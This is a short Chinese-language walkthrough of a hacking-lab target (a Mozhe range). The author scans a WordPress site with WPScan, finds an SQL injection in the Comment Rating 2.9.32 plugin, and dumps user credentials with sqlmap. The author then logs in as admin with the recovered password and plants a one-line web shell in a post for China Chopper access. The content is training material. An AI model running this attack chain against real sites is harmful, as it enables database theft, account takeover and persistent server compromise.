靶場地址:
https://www.mozhe.cn/bug/detail/S0JTL0F4RE1sY2hGdHdwcUJ6aUFCQT09bW96aGUmozhe
開啟kali虛擬機,使用WPScan掃描漏洞
執行命令 wpscan -u 219.153.49.228:48309
掃描漏洞
執行命令掃描插件漏洞wpscan -u 219.153.49.228:48309 --enumerate vp,掃描到插件漏洞,插件Comment Rating 2.9.32存在sql注入漏洞
網上查找漏洞詳情,漏洞所在頁面為:http://ip/wordpress/wp-content/plugins/comment-rating/ck-processkarma.php?id=2&action=add&path=a
交給sqlmap跑,執行 sqlmap -u "[url]"--dbs
執行sqlmap -u "[url]" -D test --tables
執行sqlmap -u "[url]" -D test -T wp_users --columns
執行sqlmap-u "[url]" -D test -T wp_users -C "user_login,user_pass" --dump --batch
后臺登錄地址:
http://219.153.49.228:48309/wp-login.php
這里sqlmap顯示出了點問題登錄賬號密碼是 admin/12qwaszx
登錄后臺
在寫文章處插入一句話代碼,發布成功后查看文章,記錄url,就可以上菜刀連接了